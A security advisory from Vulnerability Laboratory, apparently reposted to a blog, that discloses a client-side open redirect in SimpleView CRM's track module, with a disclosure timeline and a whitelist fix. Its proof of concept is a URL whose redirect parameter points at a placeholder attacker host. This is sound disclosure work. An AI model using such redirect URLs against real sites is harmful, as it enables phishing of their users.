Social:     http://twitter.com/#!/vuln_lab              - http://ift.tt/1kouSqa                         - http://youtube.com/user/vulnerability0lab
Feeds:      http://ift.tt/1iS1DH0       - http://ift.tt/1kouSqh                 - http://ift.tt/1kouTKS
Programs:   http://ift.tt/1iS1GCs       - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Source: Gmail -> IFTTT-> Blogger

[FD] SimpleView CRM - Client Side Open Redirect Vulnerability

Document Title: =============== SimpleView CRM - Client Side Open Redirect Vulnerability References (Source): ==================== http://ift.tt/1SB8mcW Release Date: ============= 2016-02-02 Vulnerability Laboratory ID (VL-ID): ==================================== 1668 Common Vulnerability Scoring System: ==================================== 2.8 Product & Service Introduction: =============================== Customer Relationship Management only scratches the surface of our web-based destination management system. Combining meeting sales, industry partner management, consumer marketing, forecasting, business analysis, reporting, and more, Simpleview CRM is the most widely used tool in destination marketing. (Copy of the Vendor Homepage: http://ift.tt/1R7YW6O ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a client-side redirect web vulnerability in the official SimpleView CRM web-application. Vulnerability Disclosure Timeline: ================================== 2016-01-17: Researcher Notification & Coordination (Tommy DeVoss) 2016-01-18: Vendor Notification (SimpleView CRM Security Team) 2016-02-02: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== SimpleView Product: CRM - Application 2016 Q1 Exploitation Technique: ======================= Remote Severity Level: =============== Low Technical Details & Description: ================================ An open redirect web vulnerability has been discovered in the official SimpleView CRM web-application. The bug allows remote attackers to execute external urls by the internal web-application requests via client-side. The vulnerability is located in the `redirect` parameter of the vulnerable `./crm/track/` module. The vulnerability allows an remote attacker to prepare client-side malicious urls to external sources. The request method to execute is GET and the vulnerability is located on the application-side of the online-service. The vulnerability is a classic open redirect web vulnerability. The security risk of the open redirect web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0. Exploitation of the persistent input validation web vulnerability requires no privileged user account and low or medium user interaction. Successful exploitation of the vulnerability results in client-side redirects to malicious sources or client-side phishing. Request Method(s): [+] GET Vulnerable Module(s): [+] ./crm/track/ Vulnerable Parameter(s): [+] redirect Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers without privileged web-application user account and with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Vulnerability: Open redirect in the following module: /plugins/crm/track/?key=4_314&redirect=http://EVILURLHERE.com PoC: www.example.com/plugins/crm/track/?key=4_314&redirect=http://test.de/ Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure restriction of the `redirect/key` parameter in the `plugins` module of the software. Disallow to request not whitelisted webpages in the `redirect` value and include a tag filter to prevent as well. Security Risk: ============== The security risk of the client-side open redirect web vulnerability in the simpleview crm web-application is estimated as low. (CVSS 2.8) Credits & Authors: ================== Tommy DeVoss Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

Latest YouTube Video

Saturday, February 6, 2016

Friday, February 5, 2016

But, Victory! The decision is in favor of Assange.

But, Will UK and Sweden Let Assange Leave the country?

Assange's Lawyer: Sweden and UK should Respect UN’s Decision

What is Dridex Banking Trojan? How it Works?

Hacker replaces Trojan with Anti-virus

What can be done to protect From Malware Attacks?

Thursday, February 4, 2016

Wednesday, February 3, 2016

Why Linux Subsystem?